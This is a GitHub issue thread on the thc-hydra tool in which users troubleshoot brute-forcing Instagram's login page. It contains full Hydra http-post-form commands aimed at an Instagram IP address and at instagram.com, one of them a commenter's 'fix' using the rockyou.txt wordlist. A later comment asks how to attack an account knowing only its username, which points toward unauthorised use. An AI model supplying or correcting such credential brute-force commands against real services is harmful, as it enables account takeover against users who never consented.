### ISSUE TITLE
Hydra finding all passwords valid

### ISSUE THREAD

**Issue by LOLSAMET1** [vanhauser-thc/thc-hydra#788]
So recently i have been trying to bruteforce login pages like Instagram for example. I used my account of course and i did not hack anyone else without their permission. In fact i have not hacked anyone else. My line goes like this

hydra -l lolsamet0 -P /home/lolsamet/Wordlist/Wordlist -v -V 31.13.72.174 http-post-form "/accounts/login/ajax:username=^USER^&password=^PASS^&Log+In=Log+In:Sorry, your password was incorrect. Please double-check your password."

I will also link a photo

![Skärmbild (15)](https://user-images.githubusercontent.com/110857877/189532869-99275364-df51-4ee1-965b-471270e63b9b.png)

**Comment by LOLSAMET1** [comment]
How can i solve this does anyone have an idea?

**Comment by poutsarxidis** [comment]
Instead of typing the IP type "instagram.com"

example:

hydra -l user123 -P rockyou.txt instagram.com http-post-form "/accounts/login/ajax:username=^USER^&password=^PASS^&Log+In=Log+In:Sorry, your password was incorrect. Please double-check your password."

**Comment by bestbrainbestofall** [comment]
I dont have the Ip address so how can i attack with just my username??

**Comment by a78738825** [comment]
Did you found any solution
?

**Comment by taskia9** [comment]
> Did you found any solution ?

Any solution?
